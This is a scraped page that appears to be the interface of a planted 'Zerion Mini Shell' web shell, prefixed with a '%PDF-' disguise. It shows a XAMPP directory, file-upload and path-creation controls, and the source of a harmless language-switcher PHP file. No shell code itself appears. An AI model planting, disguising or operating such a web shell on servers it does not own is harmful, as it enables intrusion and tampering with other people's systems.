%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : E:/nuevo/htdocs/xampp/
Upload File :
Create Path :
Current File : E:/nuevo/htdocs/xampp/lang.php

<?php
	include("lang/languages.php");
	while (list($key, $value) = each($languages))
	{
		if ($_SERVER['QUERY_STRING'] == $key)
		{
			$fp=fopen("lang.tmp","w");
			fwrite($fp,basename($key));
			fclose($fp);
			header("Location: index.php");
		}
	}
?>

Zerion Mini Shell 1.0